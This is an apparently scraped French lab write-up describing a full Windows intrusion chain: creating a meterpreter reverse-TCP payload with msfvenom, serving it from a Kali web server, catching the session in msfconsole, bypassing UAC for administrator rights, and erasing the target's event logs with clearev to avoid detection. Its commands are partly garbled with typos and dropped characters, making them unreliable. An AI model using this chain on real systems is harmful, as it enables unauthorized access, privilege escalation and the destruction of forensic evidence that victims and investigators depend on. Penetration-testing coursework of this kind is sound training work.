Obtenir les privileges d x27 administrateur systeme et supprimer toutes les traces de piratage
Obtenir les privilèges d'administrateur système et supprimer toutes les traces de piratage Ce TP se déroulera en cinq phases Etape Création du Payload Etape Placement du Payload dans le dossier www pour faciliter le partage avec la cible Etape Téléchargement et exécution du Payload sur la machine cible via l ? ip de la machine Kali Etape Lancement de notre serveur d ? écoute avec MSFCONSOLE Etape E ?acer nos traces Document produit par Saliou Thiobane NB Nous allons ici jeter un coup d ? ?il sur le contenu du ?chier log de notre machine cible avant de mener l ? attaque CImage - logs de la machine cible avant l ? attaque Etape Création du Payload Msfvenom -a x - - platfom windows -p windows meterprter reverse tcp lhost ip de la machine kali ? lport -f exe -o NomDuFichier exe Etape Placement du Payload dans le dossier www pour facilité le partage avec la cible CEnsuite démarrer le serveur apache pour que notre dossier de partage serveur web soit accessible à distance via l ? ip de la machine Kali Etape Téléchargement et exécution du Payload sur la machine cible via l ? ip de la machine Kali Sur le navigateur de la cible saisir l ? ip de Kali X nomdu ?chier exe Etape Lancement de notre serveur d ? écoute avec MSFCONSOLE use exploit multi handler set payload windows meterpreter reverse tcp set lhots ip de la machine kali ? set lport exploit Une fois que la cible exécute notre payload nous obtenons un meterpreter Bingooo Après avoir obtenu l ? accès nous devons e ?acer par la suite nos traces pour ne pas être repérer Allons-y Sur le meterpreter nous allons taper la commande clearev qui va nettoyer les logs de la machine cible CIci le souci si l ? on exécute cette commande naturellement le système nous bloque car nous ne disposons pas les droits nécessaires pour faire cette action car nous somme connecter en tant utilisateur simple hors pour faire cette action nous devons avoir plus de privilèges se connecter en tant que admin system ? A ce niveau nous allons mettre notre session en arrière-plan pour la récupérer plus tard avec la commande background ? puis on fait un search uac User Account Control Choisir l ? option et renseigner les options avec la commande Set Payload Set Lhost Set Lport Set session la session qui a été mise en arrière-plan exploit CUne fois l ? exploit réussi ou constatons avoir les droits requis pour bypasser les UAC User Account Control RMQ sur l ? image ci-haut nous voyons clairement que l ? on possède les droits d ? administrateur sur le système de la cible Etape Suppression des logs de la cible Voilà avec la commande clearev nous avons pu e ?acer nos traces C
Documents similaires










-
46
-
0
-
0
Licence et utilisation
Gratuit pour un usage personnel Aucune attribution requise- Détails
- Publié le Sep 18, 2021
- Catégorie Industry / Industr...
- Langue French
- Taille du fichier 25.4kB